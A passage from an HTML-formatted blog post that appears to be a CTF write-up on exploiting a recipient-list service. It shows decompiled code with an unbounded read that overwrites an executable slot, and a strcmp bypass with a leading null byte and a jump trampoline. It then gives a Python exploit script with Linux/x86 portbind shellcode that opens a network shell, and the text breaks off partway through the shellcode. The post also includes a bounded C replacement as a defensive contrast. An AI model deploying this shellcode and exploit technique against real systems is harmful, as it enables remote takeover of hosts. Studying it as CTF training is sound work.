<span class="fullpost"><span class="fullpost"><span style="font-size: small;">i </span><span style="color: #339933; font-size: small;">+=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">4</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">&</span><span style="font-size: small;">v15</span><span style="color: #009900; font-size: small;">[</span><span style="font-size: small;">i</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> 0xC304C483u</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;">i </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">0</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #b1b100; font-size: small;">while</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">2</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">)</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #009900; font-size: small;">{</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #b1b100; font-size: small;">if</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> read</span><span style="color: #009900; font-size: small;">(</span><span style="color: #0000dd; font-size: small;">0</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">&</span><span style="font-size: small;">ptr</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> 1u</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">)</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">{</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> s2</span><span style="color: #009900; font-size: small;">[</span><span style="font-size: small;">i</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> ptr</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #b1b100; font-size: small;">if</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> ptr </span><span style="color: #339933; font-size: small;">!=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">124</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">)</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">{</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">++</span><span style="font-size: small;">i</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #b1b100; font-size: small;">continue</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">}</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> s2</span><span style="color: #009900; font-size: small;">[</span><span style="font-size: small;">i</span><span style="color: #009900; font-size: small;">]</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">0</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">}</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">break</span><span style="color: #339933; font-size: small;">;</span></span></span><br />
<span class="fullpost"><span class="fullpost"><span style="color: #009900; font-size: small;">}</span></span></span></div><span class="fullpost"><span class="fullpost"><br />
This buffer disassembles to:<br />
<div class="asm" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"><span style="color: #00007f; font-size: small; font-weight: bold;">push</span><span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">dword</span><span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">ptr</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small; font-weight: bold;">[</span><span style="color: #00007f; font-size: small;">esp</span><span style="color: #339933; font-size: small;">+</span><span style="color: blue; font-size: small;">0x8</span><span style="color: #009900; font-size: small; font-weight: bold;">]</span><br />
<span style="color: #00007f; font-size: small; font-weight: bold;">call</span><span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">dword</span><span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">ptr</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small; font-weight: bold;">[</span><span style="color: #00007f; font-size: small;">esp</span><span style="color: #339933; font-size: small;">+</span><span style="color: blue; font-size: small;">0x8</span><span style="color: #009900; font-size: small; font-weight: bold;">]</span><br />
<span style="color: #00007f; font-size: small; font-weight: bold;">add</span><span style="font-size: small;"> </span><span style="color: #00007f; font-size: small;">esp</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> </span><span style="color: blue; font-size: small;">0x4</span><br />
<span style="color: #00007f; font-size: small; font-weight: bold;">ret</span><span style="font-size: small;"> </span></div><br />
As you can see from this piece of code, there is no bound on the number of bytes written into the s2 buffer, so it is also possible to overwrite the code at s2+260. But first of all we need to find the place where this buffer is called. Note that the buffer size is 284; the last values are the list entry's links. Also note that, for adding and deleting recipients, the input must have + in the first position and | as the last symbol.<br />
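To show the bug class from the defender's side, here is an added example (my own code, not from the CTF binary or the original post) that models the decompiled read loop above next to a bounded replacement that can never reach the code slot at offset 260; the byte_source type, the function names and the scratch-buffer observation are constructed for the demonstration.<br />

```c
#include <stddef.h>
#include <string.h>

/* Layout of one recipient entry as reconstructed from the decompiled listing:
 * bytes 0..259 hold the name, byte 260 is the int3 followed by the trampoline
 * at 261, and the list links sit at 276 (next) and 280 (prev). The page is
 * also mapped RWX (mprotect with 7), which is why stray bytes there matter. */
#define ENTRY_SIZE   284
#define CODE_OFFSET  260
#define NAME_MAX     (CODE_OFFSET - 1)   /* longest name that still leaves room for the NUL */

/* Constructed stand-in for read(0, &ptr, 1): hands out one byte at a time
 * from a fixed buffer so both readers can be exercised without a live socket. */
typedef struct {
    const unsigned char *data;
    size_t len;
    size_t pos;
} byte_source;

static byte_source make_source(const unsigned char *data, size_t len)
{
    byte_source src = { data, len, 0 };
    return src;
}

static int next_byte(byte_source *src, unsigned char *out)
{
    if (src->pos >= src->len)
        return 0;                     /* read() returned 0: the original breaks out */
    *out = src->data[src->pos++];
    return 1;
}

/* The loop from the binary, as decompiled: bytes are stored at increasing
 * indices until a '|' (124) arrives, with no check against the entry size.
 * For the demonstration it writes into a scratch buffer of 'scratch_len' bytes
 * (larger than ENTRY_SIZE) so the overrun can be observed rather than
 * corrupting memory; it returns the index the terminator was written at. */
size_t read_recipient_unbounded(byte_source *src, unsigned char *scratch,
                                size_t scratch_len)
{
    unsigned char c;
    size_t i = 0;
    while (next_byte(src, &c)) {
        if (c == '|') {
            if (i < scratch_len)
                scratch[i] = 0;
            return i;
        }
        if (i < scratch_len)          /* guard exists only in this demonstration */
            scratch[i] = c;
        ++i;                          /* the original keeps counting past 284 */
    }
    return i;
}

/* Hardened version: refuse any name that would reach CODE_OFFSET, so neither
 * the name bytes nor the terminating NUL can touch the code or the list links.
 * Returns 0 on success and -1 when the name is too long or unterminated; on
 * failure the entry is left untouched. */
int read_recipient_bounded(byte_source *src, unsigned char *entry)
{
    unsigned char tmp[NAME_MAX + 1];
    unsigned char c;
    size_t i = 0;
    while (next_byte(src, &c)) {
        if (c == '|') {
            tmp[i] = 0;
            memcpy(entry, tmp, i + 1);
            return 0;
        }
        if (i >= NAME_MAX)
            return -1;                /* would spill into entry[260] */
        tmp[i++] = c;
    }
    return -1;                        /* stream ended without '|' */
}
```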
<br />
Let's move to the '-' handler.<br />
<br />
<div class="c" style="background-color: #f0f0f0; border: 1px solid rgb(208, 208, 208); color: #000066; font-family: monospace;"><span style="color: #b1b100; font-size: small;">for</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> s2 </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #993333; font-size: small;">char</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">**</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">&</span><span style="font-size: small;">recipients</span><span style="color: #009900; font-size: small;">[</span><span style="color: #0000dd; font-size: small;">276</span><span style="color: #009900; font-size: small;">]</span><span style="color: #339933; font-size: small;">;</span><span style="font-size: small;"> s2 </span><span style="color: #339933; font-size: small;">!=</span><span style="font-size: small;"> recipients</span><span style="color: #339933; font-size: small;">;</span><span style="font-size: small;"> s2 </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="color: #993333; font-size: small;">char</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">69</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">)</span><br />
<span style="color: #009900; font-size: small;">{</span><br />
<span style="font-size: small;"> </span><span style="color: #b1b100; font-size: small;">if</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">!</span><span style="font-size: small;">strcmp</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">s1</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> s2</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">)</span><br />
<span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">{</span><br />
<span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="color: #993333; font-size: small;">void</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">__cdecl </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> </span><span style="color: #993333; font-size: small;">char</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">261</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">(</span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">64</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> s2</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">(</span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">69</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">280</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">70</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="color: #009900; font-size: small;">(</span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">70</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">276</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">(</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">_DWORD </span><span style="color: #339933; font-size: small;">*</span><span style="color: #009900; font-size: small;">)</span><span style="font-size: small;">s2 </span><span style="color: #339933; font-size: small;">+</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">69</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> </span><span style="color: #b1b100; font-size: small;">if</span><span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;"> debug </span><span style="color: #009900; font-size: small;">)</span><br />
<span style="font-size: small;"> fprintf</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">stderr</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> </span><span style="color: red; font-size: small;">"Recipient %s removed<span style="color: #000099; font-weight: bold;">\n</span>"</span><span style="color: #339933; font-size: small;">,</span><span style="font-size: small;"> s1</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> free</span><span style="color: #009900; font-size: small;">(</span><span style="font-size: small;">s2</span><span style="color: #009900; font-size: small;">)</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> s2 </span><span style="color: #339933; font-size: small;">=</span><span style="font-size: small;"> </span><span style="color: #0000dd; font-size: small;">0</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> </span><span style="color: black; font-size: small; font-weight: bold;">break</span><span style="color: #339933; font-size: small;">;</span><br />
<span style="font-size: small;"> </span><span style="color: #009900; font-size: small;">}</span><br />
<span style="color: #009900; font-size: small;">}</span></div><br />
As you can see, there is a call to s2 + 261 in the '-' handler if the recipient exists in the list.<br />
So all that is needed is to put the shellcode into the buffer as a recipient and then delete this recipient. The one problem was getting past the strcmp call; for that purpose a 00 byte is added as the first value. <br />
Then put the shellcode, and at offset 261 put a relative jmp 260 bytes back: "\xe9\xf7\xfe\xff\xff". <br />
In my example I take the Linux/x86 forking portbind shellcode (port=0xb0ef (45295), 200 bytes) from <a href="http://shell-storm.org/shellcode/files/shellcode-553.php">Shell-Storm</a>.<br />
<br />
<div class="python" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"><span style="color: #ff7700; font-size: small; font-weight: bold;">import</span><span style="font-size: small;"> </span><span style="color: crimson; font-size: small;">socket</span><br />
<span style="color: #ff7700; font-size: small; font-weight: bold;">import</span><span style="font-size: small;"> </span><span style="color: crimson; font-size: small;">sys</span><br />
<span style="font-size: small;">HOST, PORT = </span><span style="color: darkslateblue; font-size: small;">"192.168.1.3"</span><span style="font-size: small;">, </span><span style="color: orangered; font-size: small;">9119</span><br />
<span style="font-size: small;">shell = </span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>00"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c9<span style="color: #000099; font-weight: bold;">\x</span>51<span style="color: #000099; font-weight: bold;">\x</span>b1"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>06<span style="color: #000099; font-weight: bold;">\x</span>51<span style="color: #000099; font-weight: bold;">\x</span>b1<span style="color: #000099; font-weight: bold;">\x</span>01<span style="color: #000099; font-weight: bold;">\x</span>51<span style="color: #000099; font-weight: bold;">\x</span>b1<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>51"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>01<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>c1<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>50"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>68<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>ef<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>66"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e2<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>10<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>02"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>51<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>ca<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>66"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>39<span style="color: #000099; font-weight: bold;">\x</span>c3<span style="color: #000099; font-weight: bold;">\x</span>74<span style="color: #000099; font-weight: bold;">\x</span>05"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>40<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>50"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>04<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>cd"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>d7<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>31"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>c9<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>11<span style="color: #000099; font-weight: bold;">\x</span>b1<span style="color: #000099; font-weight: bold;">\x</span>01<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>cd"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>57"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>b3<span style="color: #000099; font-weight: bold;">\x</span>05<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>c6<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>db<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>02"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>39<span style="color: #000099; font-weight: bold;">\x</span>c3<span style="color: #000099; font-weight: bold;">\x</span>75<span style="color: #000099; font-weight: bold;">\x</span>40<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>fb<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>06<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c9<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>f3<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>3f<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>3f<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>3f<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>68<span style="color: #000099; font-weight: bold;">\x</span>2f<span style="color: #000099; font-weight: bold;">\x</span>2f<span style="color: #000099; font-weight: bold;">\x</span>73<span style="color: #000099; font-weight: bold;">\x</span>68<span style="color: #000099; font-weight: bold;">\x</span>68<span style="color: #000099; font-weight: bold;">\x</span>2f"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>62<span style="color: #000099; font-weight: bold;">\x</span>69<span style="color: #000099; font-weight: bold;">\x</span>6e<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e3<span style="color: #000099; font-weight: bold;">\x</span>8b<span style="color: #000099; font-weight: bold;">\x</span>54<span style="color: #000099; font-weight: bold;">\x</span>24"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>08<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>89<span style="color: #000099; font-weight: bold;">\x</span>e1<span style="color: #000099; font-weight: bold;">\x</span>b0<span style="color: #000099; font-weight: bold;">\x</span>0b<span style="color: #000099; font-weight: bold;">\x</span>cd"</span><br />
<span style="font-size: small;">shell +=</span><span style="color: darkslateblue; font-size: small;">"<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0<span style="color: #000099; font-weight: bold;">\x</span>40<span style="color: #000099; font-weight: bold;">\x</span>cd<span style="color: #000099; font-weight: bold;">\x</span>80<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>c0"</span><br />
